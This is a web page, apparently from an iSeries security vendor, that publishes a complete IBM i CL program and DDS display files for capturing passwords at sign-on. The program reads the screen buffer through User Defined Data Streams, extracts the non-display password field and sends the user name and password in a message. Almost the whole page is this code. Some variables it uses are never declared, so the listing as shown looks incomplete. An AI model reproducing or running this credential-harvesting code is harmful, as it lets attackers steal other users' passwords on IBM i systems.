Get Passwords Program

A CL Program to capture passwords at Sign-On using User Defined Data Streams (UDDS)..

IBOD

Steal Passwords Program:


/* Get Password . Written by Trevor Seeney. Copyright Sentinex Inc.*/ 
	PGM 
	
	DCLF FILE(GETDSPC)

	DCL VAR(&GETIMG) TYPE(*CHAR) LEN(7) +
		VALUE(X'00020780730462')

	DCL VAR(&STRING) TYPE(*CHAR) LEN(999)
	DCL VAR(&STRLEN) TYPE(*DEC) LEN(3 0) VALUE(999)
	DCL VAR(&PATLEN) TYPE(*DEC) LEN(3 0)
	DCL VAR(&POSN) TYPE(*DEC) LEN(3 0)
	DCL VAR(&UL) TYPE(*CHAR) LEN(1) VALUE(X'24')
	
	DCL VAR(&USER) TYPE(*CHAR) LEN(10)
	DCL VAR(&PASSWORD) TYPE(*CHAR) LEN(10)

	DCL VAR(&MSG) TYPE(*CHAR) LEN(200)
	DCL VAR(&MSGID) TYPE(*CHAR) LEN(7)
	DCL VAR(&MSGL) TYPE(*CHAR) LEN(10)
	MONMSG MSGID(CPF0000) EXEC(GOTO CMDLBL(ERROR))

/* Get screen image */
	OVRDSPF FILE(GETDSPC) TOFILE(GETDSPX) LVLCHK(*NO)
	CHGVAR VAR(%SST(&B 1 7)) VALUE(&GETIMG)
	SNDRCVF RCDFMT(SCREEN)
	CHGVAR VAR(&STRING) VALUE(%SST(&B 1 999))

/* Find "User" string */
	CHGVAR VAR(&STRPOS) VALUE(1)
	CHGVAR VAR(&PATLEN) VALUE(4)
	CALL PGM(QCLSCAN) PARM(&STRING &STRLEN &STRPOS +
		'User' &PATLEN '0' '0' ' ' &POSN)

	IF COND(&POSN *LE 0) THEN(RETURN)
 
/* Find UnderLine attribute */
	CHGVAR VAR(&STRPOS) VALUE(&POSN)
	CHGVAR VAR(&PATLEN) VALUE(1)
	CALL PGM(QCLSCAN) PARM(&STRING &STRLEN &STRPOS +
		&UL &PATLEN '0' '0' ' ' &POSN)
	IF COND(&POSN *LE 0) THEN(RETURN)
	CHGVAR VAR(&POSN) VALUE(&POSN +1)
	CHGVAR VAR(&USER) VALUE(%SST(&STRING &POSN 10))

/* Find "Password" string */
	CHGVAR VAR(&STRPOS) VALUE(&POSN + 10)
	CHGVAR VAR(&PATLEN) VALUE(8)
	CALL PGM(QCLSCAN) PARM(&STRING &STRLEN &STRPOS +
	'Password' &PATLEN '0' '0' ' ' &POSN)
	IF COND(&POSN *LE 0) THEN(RETURN)

/* Find Non-Display attribute */
	CHGVAR VAR(&STRPOS) VALUE(&POSN)
	CHGVAR VAR(&PATLEN) VALUE(1)
	CALL PGM(QCLSCAN) PARM(&STRING &STRLEN &STRPOS +
		&ND &PATLEN '0' '0' ' ' &POSN)
	IF COND(&POSN *LE 0) THEN(RETURN)
	CHGVAR VAR(&POSN) VALUE(&POSN +1)
/* Retreive the password */
	CHGVAR VAR(&PASSWORD) VALUE(%SST(&STRING &POSN 10))

	SNDPGMMSG MSGID(CPF9898) MSGF(QCPFMSG) MSGDTA(&USER || +
		&PASSWORD)
	RETURN

ERROR: 
MSGD:   RCVMSG MSGTYPE(*DIAG) MSG(&MSG) MSGDTA(&MSGDTA) +
		MSGID(&MSGID) MSGF(&MSGF) MSGFLIB(&MSGL)
	IF COND(&MSGID *NE ' ') THEN(DO)
	SNDPGMMSG MSGID(&MSGID) MSGF(&MSGL/&MSGF) +
		MSGDTA(&MSGDTA) MSGTYPE(*DIAG)
	GOTO CMDLBL(MSGD)
	ENDDO
MSGE:   RCVMSG MSGTYPE(*EXCP) MSG(&MSG) MSGDTA(&MSGDTA) +
		MSGID(&MSGID) MSGF(&MSGF) MSGFLIB(&MSGL)
	IF COND(&MSGID *NE ' ') THEN(SNDPGMMSG +	
		MSGID(&MSGID) MSGF(&MSGL/&MSGF) +	
		MSGDTA(&MSGDTA) MSGTYPE(*ESCAPE))
	ENDPGM

GETDSPC is used to compile the program GETPWD.

DDSSRC source: GETDSPC 
A 			R SCREEN
A 			  B 		1919 B   1  2
A 			R FAKE		 	      USRDFN

The intent of this file is to create a display file buffer of 1919 bytes.


GETDSPX is used during the execution of the program GETPWD

DDSSRC source: GETDSPX 
A 			R SCREEN                      USRDFN
A 			R FAKE		 	      
A 			  B 		1919 B   1  2

Home | Software Solutions | iSeries Security | Tips & Techniques | Consulting | About us | Contact Us



Sentinex Inc.

Telephone: (800) 822 1004
E-Mail: info@sentinex.com
Mail: Sentinex Inc. 379 Hamilton Drive
Stewartsville, NJ, 08886